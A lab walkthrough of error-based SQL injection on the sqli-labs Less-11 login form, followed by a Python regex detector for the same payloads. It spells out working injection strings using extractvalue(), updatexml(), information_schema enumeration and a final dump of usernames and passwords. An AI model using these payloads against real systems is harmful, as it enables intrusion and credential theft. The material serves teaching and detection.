Software used: phpstudy (MySQL5.7.26, PHP5.3.29), sqli-labs shooting range, Burp Suite, Google Chrome, win11
Functions used for error reporting and echoing
updatexml()
extractvalue()
Shooting range drill
Step 1 – Determine whether to use single quotes or double quotes.
Step 2 – Determine the number of columns
Step 3 – Blind injection using extractvalue() function
Step 4 – Find the table name
Step 5 – Find fields in the table
Step 6 – Get the data in the field
Supplement
updatexml() function
or
Blind injection means that, during the injection process, the data we obtain cannot be displayed directly on the front-end page, so we have to use other methods to judge or probe. We call this blind injection, and error echo (error-based injection) is one of those methods.
Functions used for error reporting and echoing
updatexml()
- Replaces the part of the target XML matched by the XPath expression with a new value
- updatexml(XML_document, XPath_String, new_value);
- First parameter: XML_document, a string, the XML document (doc) to operate on
- Second parameter: XPath_String, a string in XPath format
- Third parameter: new_value, a string that replaces the matched data
extractvalue()
- Returns a string containing the value selected from the target XML
- extractvalue(XML_document, XPath_String)
- First parameter: XML_document, a string, the XML document (doc) to operate on
- Second parameter: XPath_String, a string in XPath format
Shooting range drill
The practice range is sqli-labs / Less-11, and the extractvalue() function is used as the example.
Step 1 – Determine whether to use single quotes or double quotes
We submit the quote characters (' and ") to find out which symbol closes the string at our injection point; knowing this makes the subsequent injection easier.
uname=zhangsan'"&passwd=123123&submit=Submit
Step 2 – Determine the number of columns
To find the number of columns we use the ORDER BY clause: the number placed after it is increased until the query errors, which tells us how many columns the query has.
uname=zhangsan' order by 3 -- +&passwd=123123&submit=Submit
Step 3 – Blind injection using the extractvalue() function
Recall that extractvalue() takes two parameters, the second being XPath_String (an XPath-format string). In error-based blind injection we place our query in that XPath position: because the result is not valid XPath, MySQL rejects it and echoes the value inside the error message.
uname=zhangsan' union select 1,extractvalue(1,(select version())) -- +&passwd=123123&submit=Submit
The version is obviously not displayed in full, so we use another function, concat(), so that our information is shown completely.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select version()))) -- +&passwd=123123&submit=Submit
Here 0x7e is hexadecimal (decimal 126), the ASCII code of the tilde (~).
Step 4 – Find the table name
This step works the same way as the previous one: we enter our SQL statement where the XPath string would normally go.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database()))) -- +&passwd=123123&submit=Submit
Here the subquery obviously returns more than one row, so we use another clause, LIMIT.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database() limit 0,1),0x7e)) -- +&passwd=123123&submit=Submit
The 0 and 1 after LIMIT mean: starting at offset 0, return one row. To see the next table name, change the 0 to 1, and so on.
Step 5 – Find the fields in the table
Take the table we want to query from the previous step (for example, the users table) and blindly enumerate its fields.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(column_name)from information_schema.columns where table_name=0x7573657273 limit 0,1),0x7e)) -- +&passwd=123123&submit=Submit
0x7573657273 is the hexadecimal form of the string users; it is used because some injection points only accept hexadecimal.
Step 6 – Get the data in the fields
From the previous step we know the fields in the table; through these fields we can now read the data they contain.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password)from users))) -- +&passwd=123123&submit=Submit
Supplement
updatexml() function
The blind injection method with this function is the same as with extractvalue(); it just has one more parameter.
updatexml(XML_document, XPath_String, new_value);
uname=zhangsan' union select 1,updatexml(1,concat(0x7e,(select version())),1) -- +&passwd=123123&submit=Submit
Enter our SQL statement in the position of the second parameter for the injection.
Note: the numbers in the first and third parameters should be kept consistent as far as possible; if they differ, an error is sometimes reported.
or
We can also inject using or:
'or updatexml(1,concat(0x7e,database()),0)or'
' or extractvalue(1,concat(0x7e,database())) or'
Note: the trailing or must be followed by a quotation mark.
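From the defender's side, the payloads in the drill above (steps 3 to 6) and in this supplement share a few fixed markers: a call to extractvalue() or updatexml(), concat() with the 0x7e tilde prefix, information_schema.tables or information_schema.columns, and a UNION SELECT. The following Python detector is an added example, not part of the original write-up or of sqli-labs: it decodes request parameters the way the web server would (percent-escapes and + for space) and then matches those markers on the decoded values. The sample requests are constructed from the payloads shown on this page, and the rule names and the helper functions are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request bodies (query-string form), built from the payloads
# in the drill above plus two ordinary logins. The third legitimate login contains
# an apostrophe in the name to show that a lone quote is not flagged by itself.
SAMPLE_REQUESTS = [
    "uname=zhangsan&passwd=123123&submit=Submit",
    "uname=zhangsan%27+union+select+1%2Cextractvalue%281%2Cconcat%280x7e%2C"
    "%28select+version%28%29%29%29%29+--+%2B&passwd=123123&submit=Submit",
    "uname=%27or+updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%29%2C0%29or%27"
    "&passwd=123123&submit=Submit",
    "uname=zhangsan%27+union+select+1%2Cextractvalue%281%2Cconcat%280x7e%2C"
    "%28select%28table_name%29from+information_schema.tables+where+"
    "table_schema%3Ddatabase%28%29limit+0%2C1%29%2C0x7e%29%29+--+%2B"
    "&passwd=123123&submit=Submit",
    "uname=o%27brien&passwd=hunter2&submit=Submit",
]

# Each rule names the marker it looks for; all are matched case-insensitively
# on the decoded parameter value, never on the raw encoded string.
RULES = {
    "xml_error_function": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "concat_marker": re.compile(r"\bconcat\s*\(\s*0x7e\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}


def decode_params(query_string):
    """Split a query string into (name, value) pairs, decoding each part as a
    web server does: %XX escapes are resolved and '+' becomes a space."""
    pairs = []
    for part in query_string.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_request(query_string):
    """Return the sorted list of rule names that fire on any parameter of the
    request. An empty list means no error-based injection marker was seen."""
    hits = set()
    for _name, value in decode_params(query_string):
        for rule_name, pattern in RULES.items():
            if pattern.search(value):
                hits.add(rule_name)
    return sorted(hits)


def scan_all(requests):
    """Scan a batch of requests and pair each one with its rule hits."""
    return [(req, scan_request(req)) for req in requests]


if __name__ == "__main__":
    for req, hits in scan_all(SAMPLE_REQUESTS):
        verdict = ", ".join(hits) if hits else "clean"
        print(f"{verdict:55s} <- {req[:60]}")
```

Decoding before matching is the important design choice: the payloads arrive percent-encoded, so a rule applied to the raw line would miss `extractvalue%28`. Matching on several independent markers and reporting all of them, rather than a single combined pattern, lets an analyst see which stage of the drill (version probe, table enumeration, column enumeration) a request corresponds to, and a single apostrophe in a name produces no hit at all.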